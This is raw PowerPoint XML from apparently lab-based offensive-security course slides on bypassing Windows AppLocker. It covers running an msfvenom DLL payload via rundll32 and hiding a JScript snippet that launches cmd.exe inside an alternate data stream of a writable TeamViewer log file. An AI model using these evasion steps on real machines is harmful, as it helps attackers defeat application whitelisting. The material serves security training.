          <a:p>
            <a:pPr rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">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indent="0" rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:effectLst/>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marR="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6309362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7AB8-4DA9-8764-ABB7-5181CF4AEA9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Applocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Bypasses – DLL’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C2C84C-8D76-BA94-45E1-5BB20FF339C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Code (C) Ex:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">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indent="0" rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:effectLst/>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marR="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FAB0E0B-6129-327E-1B72-F4236FD33701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814073" y="1474245"/>
            <a:ext cx="7708900" cy="4876800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3028393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7AB8-4DA9-8764-ABB7-5181CF4AEA9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Applocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Bypasses – DLL’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C2C84C-8D76-BA94-45E1-5BB20FF339C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Weaponization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create a .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> payload using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Just ask if you need a hand on the switch ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"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The above can be executed with: rundll32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>test.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, which will fire the payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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Once DLL rules are enabled in AppLocker, using the Local Group Policy editor, DLLs will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>blocke</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>o turn on, in the Advanced tab &gt; Enable the DLL rule collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Going back to the previous screen will show DLL rules allowing to be enabled and the DLL will now be blocked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">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indent="0" rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1314292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1291-A06D-DE5D-6358-894B928FCA87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alternate Data Streams (still works)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDCE830-D9C6-6F6E-DD14-B923A0101933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An Alternate Data Stream (ADS) is a binary file attribute that contains metadata. We can leverage this to append the binary data of additional streams to the original file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For our payload, we will utilize Jscript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JScript is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Microsoft's legacy dialect of the ECMAScript standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that is used in Microsoft's Internet Explorer web browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Small Jscript File:</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var shell = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>var res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shell.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">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Save as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TestPayload.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F050202020403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1042612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1291-A06D-DE5D-6358-894B928FCA87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alternate Data Streams (still works)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDCE830-D9C6-6F6E-DD14-B923A0101933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We now need to find a location that is writeable and allows execution which will allow us to execute the attached .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file to a trusted file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check your ORTHANC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for any writable files as your user. If one is not available, just upload one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can use the native type command to copy the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>test.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into an alternate data stream of the log file with the :notation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MyFILE.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FILE:MyFile.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3271933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1291-A06D-DE5D-6358-894B928FCA87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alternate Data Streams (still works)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDCE830-D9C6-6F6E-DD14-B923A0101933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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We can confirm the alternate data stream is written with the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EX: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> /r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\Users\student&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> /r "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log"Volume in drive C has no label.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Volume Serial Number is 305C-7C84</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Directory of C:\Program Files (x86)\TeamViewer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
